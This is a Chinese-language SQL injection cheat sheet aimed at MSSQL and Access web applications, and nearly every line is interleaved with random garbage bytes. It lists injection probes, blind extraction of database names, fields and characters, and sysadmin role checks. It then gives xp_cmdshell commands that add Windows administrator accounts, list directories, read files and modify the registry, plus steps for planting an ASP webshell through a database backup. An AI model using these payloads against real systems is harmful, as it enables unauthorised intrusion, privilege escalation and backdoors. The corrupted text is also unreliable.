1.判断是否有注入;and 1=1 ;and 1=2 �-/dEs��gO
2.初步判断是否是mssql ;and user>0 o}��'bv���
Ei3�zBS?J)
3.注入参数是字符'and [查询条件] and ''=' ���i�a�{c�
N��Le}Jq�p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' %�=<�IGce�
(9�mM�k�U=
5.判断数据库系统 lE
;�j�CN
��gbSt�Ar.
;and (select count(*) from sysobjects)>0 mssql A��+w�v-~3
o1O�BwPj
;and (select count(*) from msysobjects)>0 access �Gy Qm/�I�
~;��OYtz�
25|8n�feC5
c�j|*_��}�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 u%d�K�i�g�
$7�Mtt.d�6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 w$5A|%Y+V}
PS" .R�_"�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 da�A��yx-�
Tf�Z6F�8|B
9.(1)猜字段的ascii值(access) ��MZSxQ�8
JH�]K/sC�>
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �|�m?vV�Lq
2~p[�7?sp'
(2)猜字段的ascii值(mssql) q�� ����'a
"?�Ge�b�A�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 q�G9+/u�)\
F{\�gc|!i�
10.测试权限结构(mssql) 0ZPV'�`KGp
0�i8h��I6d
oXt�,e����
�>�Dg�#�9�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �=`C4qC��_
,C�i/x�nI�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- A�?"h�@-~2
UU}7U]9��u
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- E}Xka1� Bn
�N(3�R�|Ii
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �=�vh8T\�
�%�YlTF\-�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �MY��nH2w]
Vn�JMm�MM�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "�x&C�5l}n
��2�vKx]w�
;and 1=(select IS_MEMBER('db_owner'));-- >1i�rSUj"~
�F[7x*-NO-
bT!($?GNdg
B7�-��RU<n
11.添加mssql和系统的帐户 9f}X����Rz
)����06i�V
;exec master.dbo.sp_addlogin username;-- 4*�UP.�r@
;exec master.dbo.sp_password null,username,password;-- �:P�nSQjV:
�N\�1/�JW+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- h:Ndzp���{
��;<G<�1+
;exec master.dbo.xp_cmdshell 'net user username password ;+�I4&VieK
v�V�`|!5x�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- C�;\V�O)]t
Y5!b�)v�ke
;exec master.dbo.xp_cmdshell 'net user username password /add';-- |AH@ EI�>
re,.@�${H�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- _NdLcpBT�?
vU/�� D7�
FX,$_�:f6Y
�_8h8Wti�f
12.(1)遍历目录 �C@HD(..�#
c�8Q�n�N:n
;create table dirs(paths varchar(100), id int) K{��}4z�uZ
5>S�T"l_ca
;insert dirs exec master.dbo.xp_dirtree 'c:\' GG'Sp53�GE
N^elVu4 �K
;and (select top 1 paths from dirs)>0 d\X�RUO[��
i&@,5/'-_O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �^ZQCIS-R
LE���c8NQs
8gmn6d�C�f
�eZO9�GMO�
(2)遍历目录 %f[E�p 3D�
D?�+
RJs��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >�4�![&��&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ~%q7Vmk9��
|r~�
u�os�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 j+7�48QAhh
b�Gh0<r7�R
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %7�`d/dgR�
Wm6dQ�Q;Bj
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 i�WXMK��u�
^w6��eW�zI
#�cEq_[�yI
���sdF3�cX
13.mssql中的存储过程 �^[M��~K5Y
�hrM�"Z�g�
xp_regenumvalues 注册表根键, 子键 ��5�(�}H
?
^)cM&Bx�t%
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 l6B.6
'4)w
Cals�?u#U=
xp_regread 根键,子键,键值名 T��J2/?p\x
iiwpSGF�l]
;exec xp_regread g+��Ph��6W
�h1%y�:[_�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?\yB)Nd� y
:��2q
�?>\
xp_regwrite 根键,子键, 值名, 值类型, 值 p\��t�xlT�
8�)Tj�
�H'
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �1�e$��[p[
�mvf�
_@2^
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 hr�lCKL�&
�O~�Uw&Bq�
xp_regdeletevalue 根键,子键,值名 VA]ZR+��m�
@��bQ!zC�I
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 F|]�rA*2u�
oBUh]sR{�.
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 >�
I%zd/q?
R�k[8Bd?�
iH _�"W+dq
*7v�ue"I*Z
14.mssql的backup创建webshell B�y/b�VZks
P�t�3[|4�L
use model $�wXi�h#7�
fle�0c^�=�
create table cmd(str image); S��1�>Z�6�
WRMz]|+�}4
insert into cmd(str) values (''); WB"$u2{|�i
�cJq<��9(�
backup database model to disk='c:\l.asp'; |\p5m���h�
ani�t�qy#E
�:+pPr�Gj"
�bVmvjY�4
15.mssql内置函数 (j`l5r#X#/
Ard��J�."
;and (select @@version)>0 获得Windows的版本号 #��8�qyg<F
?xHtn2(�q�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa '?�L%F{g/9
?lG;,,jc,W
;and (select user_name())>0 爆当前系统的连接用户 X�k��oW��L
9l=F����v6
;and (select db_name())>0 得到当前连接的数据库 �IgiqFV�{
/kb$p8!C".
{� ;'� �:h
^*�zW��"�s
16.简洁的webshell �B�#H2RT�c
@>9A$w$H|a
use model �"x.8�8,T6
L�j-{t�% }
create table cmd(str image); qS�CTFJ�0
(�Ha�U,v�P
insert into cmd(str) values (''); $��u-��lo|
�1o)�=�GV1
backup database model to disk='g:\wwwtest\l.asp';
